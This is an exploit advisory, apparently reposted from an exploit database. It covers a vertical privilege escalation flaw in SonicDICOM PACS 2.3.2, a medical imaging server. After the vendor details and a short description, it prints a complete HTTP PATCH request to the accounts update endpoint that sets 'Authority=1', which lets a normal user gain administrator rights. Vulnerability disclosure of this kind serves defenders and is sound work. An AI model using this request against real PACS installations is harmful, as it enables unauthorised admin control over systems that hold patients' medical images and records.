###########################

# SonicDICOM PACS 2.3.2 Remote Vertical Privilege Escalation Exploit

###########################

SonicDICOM PACS 2.3.2 Remote Vertical Privilege Escalation Exploit
 
 
Vendor: JIUN Corporation
Product web page: https://www.sonicdicom.com
Affected version: 2.3.2 and 2.3.1
 
Summary: SonicDICOM is PACS software that combines the capabilities of
DICOM Server with web browser based DICOM Viewer.
 
Desc: The application suffers from a privilege escalation vulnerability.
Normal user can elevate his/her privileges by sending a HTTP PATCH request
seting the parameter 'Authority' to integer value '1' gaining admin rights.
 
Tested on: Microsoft-HTTPAPI/2.0
 
 
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 
 
Advisory ID: ZSL-2017-5396
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5396.php
 
22.11.2016
 
--
 
PATCH /viewer/api/accounts/update HTTP/1.1
Host: 172.19.0.214
Content-Length: 37
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Escalation Browser/1.0
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: {REMOVED_FOR_BREVITY}
Connection: close
 
Id=testingus&Name=peend&Authority=1


###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2017-02-13]

###########################